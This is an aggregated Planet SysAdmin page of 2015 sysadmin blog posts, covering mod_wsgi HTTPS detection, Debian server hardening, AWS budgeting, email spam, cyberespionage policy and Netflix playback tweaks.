Planet SysAdmin

May 24, 2015

Chris Siebenmann

A mod_wsgi problem with serving both HTTP and HTTPS from the same WSGI app

This is kind of a warning story. It may not be true any more (I believe that I ran into this back in 2013, probably with a 3.x version of mod_wsgi), but it's probably representative of the kind of things that you can run into with Python web apps in an environment that mixes HTTP and HTTPS.

Once upon a time I tried converting my personal site from lighttpd plus a CGI based lashup for DWiki to Apache plus mod_wsgi serving DWiki as a WSGI application. At the time I had not yet made the decision to push all (or almost all) of my traffic from HTTP to HTTPS; instead I decided to serve both HTTP and HTTPS along side each other. The WSGI configuration I set up for this was what I felt was pretty straightforward. Outside of any particular virtual host stanza, I defined a single WSGI daamon process for my application and said to put everything in it:

WSGIDaemonProcess cspace2 user=... processes=15 threads=1 maximum-requests=500 ...
WSGIProcessGroup cspace2

Then in each of the HTTP and HTTPS versions of the site I defined appropriate Apache stuff to invoke my application in the already defined WSGI daemon process. This was exactly the same in both sites, because the URLs and everything were the same:

WSGIScriptAlias /space ..../cspace2.wsgi
<Directory ...>
   WSGIApplicationGroup cspace2

(Yes, this is what is by now old syntax and may have been old even back at the time; today you'd specify the process group and/or the application group in the WSGIScriptAlias directive.)

This all worked and I was happy. Well, I was happy for a while. Then I noticed that sometimes my HTTPS site was serving URLs that had HTTP URLs in links and vice versa. In fact, what was happening is that some of the time the application was being accessed over HTTPS but thought it was using HTTP, and sometimes it was the other way around. I didn't go deep into diagnosis because other factors intervened, but my operating hypothesis was that when a new process was forked off and handled its first request it then latched whichever of HTTP or HTTPS the request had been made through and used that for all of the remaining requests it handled.

(This may have been related to my mistake about how a WSGI app is supposed to find out about HTTP versus HTTPS.)

This taught me a valuable lesson about mixing WSGI daemon processes and so on across different contexts, which is that I probably don't want to do that. It's tempting, because it reduces the number of total WSGI related processes that are rattling around my systems, but even apart from Unix UID issues it's clear that mod_wsgi has a certain amount of mixture across theoretically separate contexts. Even if this is a now-fixed mod_wsgi issue, well, where there's one issue there can be more. As I've found out myself, keeping things carefully separate is hard work and is prone to accidental slipups.

(It's also possible that this is a mod_wsgi configuration mistake on my part, which I can believe; I'm not entirely sure I understand the distinction between 'process group' and 'application group', for example. The possibility of such configuration mistakes is another reason to keep things as separate as possible in the future.)

by cks at May 24, 2015 05:06 AM

The right way for your WSGI app to know if it's using HTTPS

Suppose that you have a WSGI application that's running under Apache, either directly as a CGI-BIN through some lashup or perhaps through an (old) version of mod_wsgi (such as Django on an Ubuntu 12.04 host, which has mod_wsgi version 3.3). Suppose that you want to know if you're being invoked via a HTTPS URL, either for security purposes or for your own internal reasons (for example, you might need separate page caches for HTTP versus HTTPS requests). What is the correct way to do this?

If you're me, for a long time you do the obvious thing; you look at the HTTPS environment variable that your WSGI application inherits from Apache (or the web server of your choice, if you're also running things under an alterate). If it has the value on or sometimes 1, you've got a HTTPS connection; if it doesn't exist or has some other value, you don't.

As I learned recently by reading some mod_wsgi release notes, this is in practice wrong (and probably wrong even in theory). What I should be doing is checking wsgi.url_scheme from the (WSGI) environment to see if it was "https" or "http". Newer versions of mod_wsgi explicitly strip the HTTPS environment variable and anyways, as the WSGI PEP makes clear, including a HTTPS environment variable was always a 'maybe' thing.

(You can argue that mod_wsgi is violating the spirit of the 'should' in the PEP here, but I'm sure it has its reasons for this particular change.)

Not using wsgi.url_scheme was always kind of conveniently lazy; I was pretending that WSGI was still basically a CGI-BIN environment when it's not really. I always should have been preferring wsgi. environment variables where they were available, and wsgi.url_scheme has always been there. But I change habits slowly when nothing smacks me over the nose about them.

(This may have been part of an mod_wsgi issue I ran into at one point, but that's another entry.)

by cks at May 24, 2015 05:05 AM

May 23, 2015


An Irrelevant Thesis

This week The Diplomat published an article by Dr Greg Austin titled What the US Gets Wrong About Chinese Cyberespionage. The subtitle teases the thesis: "Is it government policy in China to pass on commercial secrets obtained via cyberespionage to civil sector firms?" As you might expect (because it prompted me to write this post), the author's answer is "no."

The following contains the argument:

"Chinese actors may be particularly adept in certain stages of economic espionage, but it is almost certainly not Chinese government policy to allow the transfer of trade secrets collected by highly classified intelligence sources to its civil sector firms for non-military technologies on a wide-spread basis.

A U.S. influencing strategy toward China premised on the claim that this is China’s policy would appear to be ill-advised based on the evidence introduced so far by the United States in the public domain." (emphasis added)

I find it interesting that the author concedes theft by Chinese government actors, which the Chinese government refuses to acknowledge. However, the author seeks to excuse this activity out of concern for the effect it has on US-China ties.

One aspect of the relationship between China and the US worries the author most:

"There are many ways to characterize the negative impact on potential bilateral cooperation on cyberspace issues of the “lawfare” being practised by the United States to discipline China for its massive cyber intrusions into the commercial secrets of U.S. firms. One downside is in my view more important than others. This is the belief being fostered by U.S. officials among elites in the United States and in other countries that China as a nation is a “cheater” country..."

Then, in a manner similar to the way Chinese spokespeople respond to any Western accusations of wrongdoing, the author turns the often-heard "Chinese espionage as the largest transfer of wealth in history" argument against the US:

"In the absence of any Administration taxonomy of the economic impacts of cyber espionage, alleged by some to represent the largest illicit transfer of wealth in human history, one way of evaluating it is to understand that for more than three decades it has been U.S. policy, like that of its principal allies, to undertake the largest lawful transfer of wealth in human history through trade with, investment in and technology transfer to China."

(I'm not sure I understand the cited benefits the US has accrued due to this "largest lawful transfer of wealth in human history," given the hollowing out of the American manufacturing sector and the trade imbalance with China, which totaled over $82 billion in 1Q15 alone. It's possible I am not appreciating what the author means though.)

Let's accept, for argument's sake, that it is not "official" Chinese government policy for its intelligence and military forces to steal commercial data from private and non-governmental Western organizations. How does accepting that proposition improve the situation? Would China excuse the US government if a "rogue" element of the American intelligence community or military pursued a multi-decade campaign against Chinese targets?

Even if the US government accepted this "Chinese data theft by rogue government actor" theory, it would not change the American position: stop this activity, by whatever means necessary. Given the power amassed by President Xi during his anti-corruption crackdown, I would expect he would be able to achieve at least some success in limiting his so-called "rogue actors" during the 2+ years since Mandiant released the APT1 report. As Nicole Perlroth reported this month, Chinese hacking continues unabated. In fact, China has introduced new capabilities, such as the so-called Great Cannon, used to degrade GitHub and others.

Similar to the argument I made in my post What Does "Responsibility" Mean for Attribution?, "responsibility" is the key issue. Based on my experience and research, I submit that Chinese computer network exploitation of private and non-governmental Western organizations is "state-integrated" and "state-executed." Greg Austin believes the activity is, at worst, "state-rogue-conducted." Stepping down one rung on the state spectrum of responsibility ladder is far from enough to change US government policy towards China.

Note: In addition to the article in The Diplomat, the author wrote a longer paper titled  China’s Cyberespionage: The National Security Distinction and U.S. Diplomacy (pdf).

I also plan to read Dr Austin's new book, Cyber Policy in China, which looks great! Who knows, we might even be able to collaborate, given his work with the War Studies department at KCL.

by Richard Bejtlich ( at May 23, 2015 04:49 PM

Feeding the Cloud

Usual Debian Server Setup

I manage a few servers for myself, friends and family as well as for the Libravatar project. Here is how I customize recent releases of Debian on those servers.

Hardware tests

apt-get install memtest86+ smartmontools e2fsprogs

Prior to spending any time configuring a new physical server, I like to ensure that the hardware is fine.

To check memory, I boot into memtest86+ from the grub menu and let it run overnight.

Then I check the hard drives using:

smartctl -t long /dev/sdX
badblocks -swo badblocks.out /dev/sdX


apt-get install etckeepr git sudo vim

To keep track of the configuration changes I make in /etc/, I use etckeeper to keep that directory in a git repository and make the following changes to the default /etc/etckeeper/etckeeper.conf:

  • turn off daily auto-commits
  • turn off auto-commits before package installs

To get more control over the various packages I install, I change the default debconf level to medium:

dpkg-reconfigure debconf

Since I use vim for all of my configuration file editing, I make it the default editor:

update-alternatives --config editor


apt-get install openssh-server mosh fail2ban

Since most of my servers are set to UTC time, I like to use my local timezone when sshing into them. Looking at file timestamps is much less confusing that way.

I also ensure that the locale I use is available on the server by adding it the list of generated locales:

dpkg-reconfigure locales

Other than that, I harden the ssh configuration and end up with the following settings in /etc/ssh/sshd_config (jessie):

HostKey /etc/ssh/ssh_host_ed25519_key
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key


UsePrivilegeSeparation sandbox

AuthenticationMethods publickey
PasswordAuthentication no
PermitRootLogin no

AcceptEnv LANG LC_* TZ
AllowGroups sshuser

or the following for wheezy servers:

HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
KexAlgorithms ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256
Ciphers aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512,hmac-sha2-256

On those servers where I need duplicity/paramiko to work, I also add the following:

KexAlgorithms ...,diffie-hellman-group-exchange-sha1
MACs ...,hmac-sha1

Then I remove the "Accepted" filter in /etc/logcheck/ignore.d.server/ssh (first line) to get a notification whenever anybody successfully logs into my server.

I also create a new group and add the users that need ssh access to it:

addgroup sshuser
adduser francois sshuser

and add a timeout for root sessions by putting this in /root/.bash_profile:


Security checks

apt-get install logcheck logcheck-database fcheck tiger debsums
apt-get remove john john-data rpcbind tripwire

Logcheck is the main tool I use to keep an eye on log files, which is why I add a few additional log files to the default list in /etc/logcheck/logcheck.logfiles:


while ensuring that the apache logfiles are readable by logcheck:

chmod a+rx /var/log/apache2
chmod a+r /var/log/apache2/*

and fixing the log rotation configuration by adding the following to /etc/logrotate.d/apache2:

create 644 root adm

I also modify the main logcheck configuration file (/etc/logcheck/logcheck.conf):


Other than that, I enable daily checks in /etc/default/debsums and customize a few tiger settings in /etc/tiger/tigerrc:

Tiger_Running_Procs='rsyslogd cron atd /usr/sbin/apache2 postgres'

General hardening

apt-get install harden-clients harden-environment harden-servers apparmor apparmor-profiles apparmor-profiles-extra

While the harden packages are configuration-free, AppArmor must be manually enabled:

perl -pi -e 's,GRUB_CMDLINE_LINUX="(.*)"$,GRUB_CMDLINE_LINUX="$1 apparmor=1 security=apparmor",' /etc/default/grub

Entropy and timekeeping

apt-get install haveged rng-tools ntp

To keep the system clock accurate and increase the amount of entropy available to the server, I install the above packages and add the tpm_rng module to /etc/modules.

Preventing mistakes

apt-get install molly-guard safe-rm sl

The above packages are all about catching mistakes (such as accidental deletions). However, in order to extend the molly-guard protection to mosh sessions, one needs to manually apply a patch.

Package updates

apt-get install apticron unattended-upgrades deborphan debfoster apt-listchanges update-notifier-common aptitude popularity-contest

These tools help me keep packages up to date and remove unnecessary or obsolete packages from servers. On Rackspace servers, a small configuration change is needed to automatically update the monitoring tools.

In addition to this, I use the update-notifier-common package along with the following cronjob in /etc/cron.daily/reboot-required:

cat /var/run/reboot-required 2> /dev/null || true

to send me a notification whenever a kernel update requires a reboot to take effect.

Handy utilities

apt-get install renameutils atool iotop sysstat lsof mtr-tiny

Most of these tools are configure-free, except for sysstat, which requires enabling data collection in /etc/default/sysstat to be useful.

Apache configuration

apt-get install apache2-mpm-event

While configuring apache is often specific to each server and the services that will be running on it, there are a few common changes I make.

I enable these in /etc/apache2/conf.d/security:

<Directory />
    AllowOverride None
    Order Deny,Allow
    Deny from all
ServerTokens Prod
ServerSignature Off

and remove cgi-bin directives from /etc/apache2/sites-enabled/000-default.

I also create a new /etc/apache2/conf.d/servername which contains:

ServerName machine_hostname


apt-get install postfix

Configuring mail properly is tricky but the following has worked for me.

In /etc/hostname, put the bare hostname (no domain), but in /etc/mailname put the fully qualified hostname.

Change the following in /etc/postfix/

inet_interfaces = loopback-only
myhostname = (fully qualified hostname)
smtp_tls_security_level = may
smtp_tls_protocols = !SSLv2, !SSLv3

Set the following aliases in /etc/aliases:

  • set francois as the destination of root emails
  • set an external email address for francois
  • set root as the destination for www-data emails

before running newaliases to update the aliases database.

Create a new cronjob (/etc/cron.hourly/checkmail):

ls /var/mail

to ensure that email doesn't accumulate unmonitored on this box.

Finally, set reverse DNS for the server's IPv4 and IPv6 addresses and then test the whole setup using mail root.

Network tuning

To reduce the server's contribution to bufferbloat I change the default kernel queueing discipline (jessie or later) by putting the following in /etc/sysctl.conf:


May 23, 2015 09:00 AM


UnicodeEncodeError: 'ascii' codec can't encode character u'\u2019'

Python LogoOnce again I was working on some Python code for EVE Online. This particular bit of code gathers a list of kills for a particular region and then summarizes that data in a daily report. Everything had been working properly, until one day...

<noscript> <pre>Traceback (most recent call last): File "/Users/scott/Dev/Scripts/Slaptijack/EVE/loss_report/", line 163, in &lt;module&gt; main() File "/Users/scott/Dev/Scripts/Slaptijack/EVE/loss_report/", line 159, in main print(template.render(context)) UnicodeEncodeError: 'ascii' codec can't encode character u'\u2019' in position 6711: ordinal not in range(128)</pre> <p></noscript>

The problem was in my Item class. My name() method (which was also used by __str__() and __unicode__()) was throwing this error on the name of a particular item that included a non-ASCII character. The trick was to encode() the text when returning from name():

<noscript> <pre>class Item(object): # ...snip... def name(self): # ...snip.... return self.crest_type['name'].encode('utf-8')</pre> <p></noscript>

If you like the idea of a video game you can write code against, check out EVE Online's free trial. That link will give you 21 days free versus the usual 14.

Related Reading:

by Scott Hebert at May 23, 2015 03:00 AM

May 22, 2015


Moving from traditional budgeting to AWS-style budgeting

I've seen this dyamic happen a couple of times now. It goes kind of like this.

October: We're going all in on AWS! It's the future. Embrace it.
November: IT is working very hard on moving us there, thank you for your patience.
December: We're in! Enjoy the future.
January: This AWS bill is intolerable. Turn off everything we don't need.
February: Stop migrating things to AWS, we'll keep these specific systems on-prem for now.
March: Move these systems out of AWS.
April: Nothing gets moved to AWS unless it produces more revenue than it costs to run.

What's prompting this is a shock that is entirely predictable, but manages to penetrate the reality distortion field of upper management because the shock is to the pocketbook. They notice that kind of thing. To illustrate what I'm talking about, here is a made-up graph showing technology spend over a course of several years.

BudgetType-AWS.pngThe AWS line actually results in more money over time, as AWS does a good job of capturing costs that the traditional method generally ignores or assumes is lost in general overhead. But the screaming doesn't happen at the end of four years when they run the numbers, it happens in month four when the ongoing operational spend after build-out is done is w-a-y over what it used to be.

The spikes for traditional on-prem work are for forklifts of machinery showing up. Money is spent, new things show up, and they impact the monthly spend only infrequently. In this case, the base-charge increased only twice over the time-span. Some of those spikes are for things like maintenance-contract renewals, which don't impact base-spend one whit.

The AWS line is much less spikey, as new capabilities are assumed into the base-budget in an ongoing basis. You're no longer dropping $125K in a single go, you're dribbling it out over the course of a year or more. AWS price-drops mean that monthly spend actually goes down a few times.

Pay only for what you use!

Amazon is great at pointing that out, and hilighting the convenience of it. But what they don't mention is that by doing so, you will learn the hard way about what it is you really use. The AWS Calculator is an awesome tool, but if you don't know how your current environment works, it's like throwing darts at a wall for accurately predicting what you'll end up spending. You end up obsessing over small line-item charges you've never had to worry about before (how many IOPs do we do? Crap! I don't know! How many thousands will that cost us?), and missing the big items that nail you (Whoa! They meter bandwidth between AZs? Maybe we shouldn't be running our Hadoop cluster in multi-AZ mode).

There is a reason that third party AWS integrators are a thriving market.

Also, this 'what you use' is not subject to Oops exceptions without a lot of wrangling with Account Management. Have something that downloaded the entire EPEL repo twice a day for a month, and only learned about it when your bandwidth charge was 9x what it should be? Too bad, pay up or we'll turn the account off.

Unlike the forklift model, you pay for it every month without fail. If you have a bad quarter, you can't just not pay the bill for a few months and tru-up later. You're spending it, or they're turning your account off. This takes away some of the cost-shifting flexibility the old style had.

Unlike the forklift model, AWS prices its stuff assuming a three year turnover rate. Many companies have a 5 to 7 years lifetime for IT assets. Three to four years in production, with an afterlife of two to five years in various pre-prod, mirror, staging, and development roles.The cost of those assets therefore amortizes over 5-9 years, not 3.

Predictable spending, at last.


Yes, it is predictable over time given accurate understanding of what is under management. But when your initial predictions end up being wildly off, it seems like it isn't predictable. It seems like you're being held over the coals.

And when you get a new system into AWS and the cost forecast is wildly off, it doesn't seem predictable.

And when your system gets the rocket-launch you've been craving and you're scaling like mad; but the scale-costs don't match your cost forecast, it doesn't seem predictable.

It's only predictable if you fully understand the cost items and how your systems interact with it.

Reserved instances will save you money

Yes! They will! Quite a lot of it, in fact. They let a company go back to the forklift-method of cost-accounting, at least for part of it. I need 100 m3.large instances, on a three year up-front model. OK! Monthly charges drop drastically, and the monthly spend chart begins to look like the old model again.


Reserved instances cost a lot of money up front. That's the point, that's the trade-off for getting a cheaper annual spend. But many companies get into AWS because they see it as cheaper than on-prem. Which means they're sensitive to one-month cost-spikes, which in turn means buying reserved instances doesn't happen and they stay on the high cost on-demand model.

AWS is Elastic!

Elastic in that you can scale up and down at will, without week/month long billing, delivery and integration cycles.

Elastic in that you have choice in your cost accounting methods. On-demand, and various kinds of reserved instances.

It is not elastic in when the bill is due.

It is not elastic with individual asset pricing, no matter how special you are as a company.

All of these things trip up upper, non-technical management. I've seen it happen three times now, and I'm sure I'll see it again at some point.

Maybe this will help you in illuminating the issues with your own management.

by SysAdmin1138 at May 22, 2015 03:37 PM

Debian Administration

Preventing SPAM connections with bird.

Bird is an Internet routing daemon with full support for all the major routing protocols. It allows you to configure hosts to share routing information, via protocols such as BGP, OSPF, or even statically. Here we're going to look at using it to automatically blacklist traffic from SPAM-sources.

by Steve at May 22, 2015 07:25 AM

Chris Siebenmann

Unsurprisingly, Amazon is now running a mail spamming service

I recently got email from an machine, cheerfully sending me a mailing list message from some random place that desperately wanted me to know about their thing. It was, of course, spam, which means that Amazon is now in the business of running a mail spamming service. Oh, Amazon doesn't call what they're running a mail spamming service, but in practice that's what it is.

For those that have not run into it, is 'Amazon Simple Email Service', where Amazon carefully sends out email for you in a way that is designed to get as much of it delivered as possible and to let you wash annoying people who complain out of your lists as effectively as possible (which probably includes forwarding complaints from those people to you, which is something that has historically caused serious problems for people who file complaints due to spammer retaliation). I translate from the marketing language on their website, of course.

In the process of doing this sends from their own IP address space, using their own HELO names, their own domain name, and completely opaque sender envelope address information. Want to get some email sent through but not the email from spammers you've identified? You're plain out of luck at the basic SMTP level; your only option is to parse the actual message during the DATA phase and look for markers. Of course this helps spammers, since they get a free ride on the fact that you may not be able to block email in general.

I'm fairly sure that Amazon does not deliberately want to run a mail spamming service. It's just that, as usual, not running a mail spamming service would cost them too much money and too much effort and they are in a position to not actually care. So everyone else gets to lose. Welcome to the modern Internet email environment, where receiving email from random strangers to anything except disposable email addresses gets to be more and more of a problem every year.

(As far as I can tell, Amazon does not even require you to use their own mailing list software, managed by Amazon so that Amazon can confirm subscriptions and monitor things like that. You're free to roll your own mail blast software and as far as I can tell my specific spammer did.)

by cks at May 22, 2015 05:05 AM

May 20, 2015

Everything Sysadmin

Design Patterns for being creepy: Playing The Odds

Recently a friend told me this story. She had given a presentation at a conference and soon after started receiving messages from a guy that wanted to talk more about the topic. He was very insistent that she was the only person that would understand his situation. Not wanting to be rude, she offered they continue in email but he wanted to meet in person. His requests became more and more demanding over time. It became obvious that he wasn't looking for mentoring or advice. He wanted a date.

She had no interest in that.

Unsure what to do, she asked a few other female attendees for advice. What a surprise to discover that the same guy had also contacted them and was playing the same game. In fact, she later found out 5 women that had attended the conference were receiving the same treatment.

Yes. Really.

Wait... it gets worse.

This is the third conference I've seen this happen. This isn't just a problem with one particular conference or even one kind of conference.

So, it isn't a coincidence, this is an M.O.

I call this pattern "playing the odds". You approach every woman that attends a conference assuming that odds are in favor that at least one will say "yes".

I'm not sure what is more insulting: the assumption that any female speaker is automatically available or interested in dating, or that the women wouldn't see right through him.

The good news in all three cases is that the conference organizers handled the situation really well once they were aware of the situation.

So, guys, if you ever think you are the first person to think of doing this, I have some sad news for you. First, you aren't the first. Second, it won't work.

To the women that speak at conferences, now that you know this is a thing, I hope it is easier to spot.

The problem is that there is no transparency in the system. It isn't obvious if the guy is doing this to a lot of women because sharing such information is difficult. It would be uncomfortable to share this information. There are many privacy concerns, in particular if the guy was contacting the women for legitimate reasons, a false-positive being publicly announced would be... bad.

If only there was a confidential service where people could register "so-and-so is contacting me saying x-y-z". If multiple people reported the same thing, it would let all parties know.

I was considering offering such a service. The implementation would be quite simple. I would set up an email inbox. Women would send messages with a subject line that contained the person's email address, name, and whether their approach was "maybe" or "very" creepy. I would check the inbox daily. For example my inbox might look like this:

Subject: Joe Baker  maybe
Subject: Mark Jones  maybe
Subject: Ken Art  maybe
Subject: Mark Jones  maybe
Subject: Ryan Example  very
Subject: Mark Jones  maybe
Subject: Mark Jones maybe

If I saw those Subject lines, I would alert the parties involved that Mark Jones seems to be on the prowl. The service wouldn't be entirely confidential, but I would do the best I could.

Then I realized I could build a system that would require zero human interaction and only be slightly less accurate. It would be a website called "" and it would be a static web page that displays the word "yes". True, it wouldn't be 100 percent accurate but exactly how less accurate is difficult to determine. If you have to ask, the answer is probably "yes".

Jokes aside, maybe someone with better programming skills could come up with an automated system that protects everyone's privacy, is secure, and strikes the right balance between transparency, privacy, and accuracy.

I'm not one of the people who is directly affected by this sort of thing, so if my thinking on these solutions is off base, I'm eager to hear it.

In the meanwhile, I'm holding on to that domain.

May 20, 2015 06:52 PM

Racker Hacker

You have a problem and isn’t one of them

laptop keyboardI really enjoy operating and the other domains. It’s fun to run some really busy services and find ways to reduce resource consumption and the overall cost of hosting.

My brain has a knack for optimization and improving the site is quite fun for me. So much so that I’ve decided to host all of out of my own pocket starting today.

However, something seriously needs to change.

A complaint came in yesterday from someone who noticed that their machines were making quite a few requests to It turns out there was a problem with malware and the complaint implicated my site as part of the problem. One of my nodes was taken down as a precaution while I furiously worked to refute the claims within the complaint. Although the site stayed up on other nodes, it was an annoyance for some and I received a few tweets and emails about it.

Long story short, if you’re sending me or my ISP a complaint about, there’s one thing you need to know: the problem is on your end, not mine. Either you have users making legitimate requests to my site or you have malware actively operating on your network.

No, it’s not time to panic.

You can actually use as a tool to identify problems on your network.

For example, add rules to your intrusion detection systems (IDS) to detect requests to the site in environments where you don’t expect those requests to take place. Members of your support team might use the site regularly to test things but your Active Directory server shouldn’t start spontaneously talking to my site overnight. That’s a red flag and you can detect it easily.

Also, don’t report the site as malicious or hosting malware when it’s not. I’ve been accused of distributing malware and participating in attacks but then, after further investigation, it was discovered that I was only returning an IPv4 address to a valid request. That hardly warrants the blind accusations that I often receive.

I’ve taken some steps to ensure that there’s a way to contact me with any questions or concerns you might have. For example:

  • You can email abuse, postmaster, and security at anytime
  • There’s a HTTP header with a link to the FAQ (which has been there for years)
  • I monitor any tweets or blog posts that are written about the site

As always, if you have questions or concerns, please reach out to me and read the FAQ. Thanks to everyone for all the support!

Photo Credit: Amir Kamran via Compfight cc

The post You have a problem and isn’t one of them appeared first on

by Major Hayden at May 20, 2015 12:50 PM

May 18, 2015

Racker Hacker

Keep old kernels with yum and dnf

When you upgrade packages on Red Hat, CentOS and Fedora systems, the newer package replaces the older package. That means that files managed by RPM from the old package are removed and replaced with files from the newer package.

There’s one exception here: kernel packages.

Upgrading a kernel package with yum and dnf leaves the older kernel package on the system just in case you need it again. This is handy if the new kernel introduces a bug on your system or if you need to work through a compile of a custom kernel module.

However, yum and dnf will clean up older kernels once you have more than three. The oldest kernel will be removed from the system and the newest three will remain. In some situations, you may want more than three to stay on your system.

To change the setting, simply open up /etc/yum.conf or /etc/dnf/dnf.conf in your favorite text editor. Look for this line:


To keep five kernels, simply replace the 3 with a 5. If you’d like to keep every old kernel on the system forever, just change the 3 to a 0. A zero means you never want “installonly” packages (like kernels) to ever be removed from your system.

The post Keep old kernels with yum and dnf appeared first on

by Major Hayden at May 18, 2015 02:22 PM

May 17, 2015

Errata Security

Our Lord of the Flies moment

In its war on researchers, the FBI doesn't have to imprison us. Merely opening an investigation into a researcher is enough to scare away investors and bankrupt their company, which is what happened last week with Chris Roberts. The scary thing about this process is that the FBI has all the credibility, and the researcher none -- even among other researchers. After hearing only one side of the story, the FBI's side, cybersecurity researchers quickly turned on their own, condemning Chris Roberts for endangering lives by taking control of an airplane.

As reported by Kim Zetter at Wired, though, Roberts denies the FBI's allegations. He claims his comments were taken out of context, and that on the subject of taking control a plane, it was in fact a simulator not a real airplane.

I don't know which side is telling the truth, of course. I'm not going to defend Chris Roberts in the face of strong evidence of his guilt. But at the same time, I demand real evidence of his guilt before I condemn him. I'm not going to take the FBI's word for it.

We know how things get distorted. Security researchers are notoriously misunderstood. To the average person, what we say is all magic technobabble anyway. They find this witchcraft threatening, so when we say we "could" do something, it's interpreted as a threat that we "would" do something, or even that we "have" done something. Important exculpatory details, like "I hacked a simulation", get lost in all the technobabble.

Likewise, the FBI is notoriously dishonest. Until last year, they forbad audio/visual recording of interviews, preferring instead to take notes. This inshrines any misunderstandings into official record. The FBI has long abused this, such as for threatening people to inform on friends. It is unlikely the FBI had the technical understanding to understand what Chris Roberts said. It's likely they willfully misunderstood him in order to justify a search warrant.

There is a war on researchers. What we do embarrasses the powerful. They will use any means possible to stop us, such as using the DMCA to suppress publication of research, or using the CFAA to imprison researchers. Criminal prosecution is so one sided that it rarely gets that far. Instead, merely the threat of prosecution ruins lives, getting people fired or bankrupted.

When they come for us, the narrative will never be on our side. They will have constructed a story that makes us look very bad indeed. It's scary how easily the FBI convict people in the press. They have great leeway to concoct any story they want. Journalists then report the FBI's allegations as fact. The targets, who need to remain silent lest their words are used against them, can do little to defend themselves. It's like how in the Matt Dehart case, the FBI alleges child pornography. But when you look into the details, it's nothing of the sort. The mere taint of this makes people run from supporting Dehart. Similarly with Chris Roberts, the FBI wove a tale of endangering an airplane, based on no evidence, and everyone ran from him.

We need to stand together on or fall alone. No, this doesn't mean ignoring malfeasance on our side. But it does mean that, absent clear evidence of guilt, that we stand with our fellow researchers. We shouldn't go all Lord of the Flies on the accused, eagerly devouring Piggy because we are so relieved it wasn't us.

P.S. Alex Stamos is awesome, don't let my bitch slapping of him make you believe otherwise.

by Robert Graham ( at May 17, 2015 09:57 AM

May 16, 2015

Netflix streaming playback speed and hidden menus

Netflix and playback speed

I have always been interested in Netflix streaming, but I could not get over not being able to adjust the playback speed. That and the movie selection stinks (out of 159 titles in my queue only 40 are available to be streamed). I still tried streaming for 30 days and really liked some of the original content Netflix had. During that time I did not find any native way to adjust the playback speed in their html5 player. This really stinks as I am used to watching video with Vlc, YouTube, and MythTV all of which allow for playback speed adjustment up to 2x. It is hard to watch anything at lower speeds anymore. After a bit more searching I finally found a way to change the playback speed in Netflix streaming video.

Chrome extension Video Speed Controller

After much searching I found an Google Chrome extension called Video Speed Controller, which allows for the speedup of html5 video streams in the browser. Netflix has an html5 player so this works with Netflix streams. Hooray!! The speedup stream does not have any buffering issues and I've watched many things on with 2x playback without issue. Unfortunately you can't use this anywhere other than the browser. Come on Netflix please add playback speed adjust to all of your players on all platforms!!!

Performance at higher speeds

Beware that when speeding up video you will need to make sure your video card can handle the higher frame rates. When I stream a video file from local storage with a local program like Vlc at 2x, it is very smooth, without much jitter or video tearing. When streaming content from Netflix or YouTube or other sites using this browser plugin you are using the browser as the video player, and it might not be as clean of an experience. You might notice some more jitter in the video and some frame tearing on fast moving scenes. This usually happens if your hardware can't keep up rendering the video or if hardware acceleration is not enabled.

Chrome hardware acceleration

My testing for this is being done on Linux with Google Chrome using the accelerated Nvidia Drivers with a GeForce GT 520 a video card from 2011. What I had to do to get rid of the jitter and tearing is turn hardware acceleration on in Chrome. Google seems to be very careful about whether or not they turn on hardware acceleration. They usually don't turn it on unless they know for sure it will work. Mine was not turned on even though I had a video card that supported acceleration and the correct drivers. Chromes detection of this might not be the best or Google did not think the drivers for this were stable enough. What is great is you can turn this on anyways and it works great.

Turn on hardware acceleration in Chrome

To see if your hardware acceleration is already turned on or not type "chrome://gpu" in your Chrome URL bar. If it's turned off you will likely see lots of red text indicating so. Look for "Video decode" and see if it says "Disabled". If so you will need to turn it on. If it says "Hardware accelerated" then your good and can skip the rest of this paragraph. To turn on the hardware acceleration in the Chrome URL bar type "chrome://flags". The first setting says "Override software rendering list". Click the "Enable" to turn on the override. Then restart Chrome. Go back to "chrome://gpu" and see if it says "Video decode: Hardware accelerated". If so go try to watch a movie again or a YouTube video and it should be much smoother and likely have less tearing. If you don't have less tearing, go into your video driver config and make sure you have Sync to VBlank enabled. Mine is in my Nvidia X server settings manager then under "OpenGL settings"-> Performance. Check the box "Sync to VBlank".

Other neat Netflix streaming things

Netflix provides some hidden menus for stats and changing bit rates of your streams. Here are some different ones to try.I tried these using Chrome on Linux. They all worked for me.

  • Stream Manager - Control+Alt+Shift+S
    • Here you will be able to choose the maximum bit rate at which you will stream. Highlighting multiple selections will give Netflix a maximum/minimum bit rate at which it will stream at.
    • This menu also gives you the option to select from which CDN you will receive your stream from. Tweak with it a bit, you might get better performance with some of them than the others.
  • AV Stats - Control+Alt+Shift+D
    • On this screen you will see a lot of "stats for nerds" sort of things, you might want to have this open when you're tweaking with the CDN to see which servers are actually giving you better speeds.
  • Log Screen - Control+Alt+Shift+L

by at May 16, 2015 07:41 PM

Michael Biven

More Messy Experiments; everything doesn’t need to be a side project

Artist have sketchbooks to doodle in and writers have journals as a way to try out new ideas and grow. Each is willing to have something they produced go no further than that moment. They both use repeatable processes to examine their talents and push their boundaries out a little.

Each bit of code you write or system you put together that isn’t involved with your day job doesn’t have to become a side project. Learning new concepts and testing out hypotheses is the goal. And you need a place where the only boundaries you have is time and your imagination.

‘Whenever you feel an impulse to perpetrate a piece of exceptionally fine writing, obey it—whole-heartedly—and delete it before sending your manuscript to press. Murder your darlings.’

– Arthur Quiller-Couch On Style from On the Art of Writing (1916)

“If I forget the words, they weren’t very memorable in the first place.”

  • Willie Nelson, on writing down lyrics source

I use these two quotes because at first you should be willing to do things that are silly, unsafe, or uncool. Make the time to take a crazy thought to it’s practical end and then examine it. Then if you create something that sticks with you, something that is memorable, well then you are onto to something worth exploring a little more.

Give yourself the freedom to experiment with your ideas and the tools available. If you don’t, you are limiting yourself to the current version of you. You cannot grow if you don’t work to remove any limits you place on yourself.

And if an experiment turns into a side project or service, well then great. Just don’t start off everything with the notion that to be a successful exercise it has to become one.

May 16, 2015 04:06 PM

Errata Security

Those expressing moral outrage probably can't do math

Many are discussing the FBI document where Chris Roberts ("the airplane hacker") claimed to an FBI agent that at one point, he hacked the plane's controls and caused the plane to climb sideways. The discussion hasn't elevated itself above the level of anti-vaxxers.

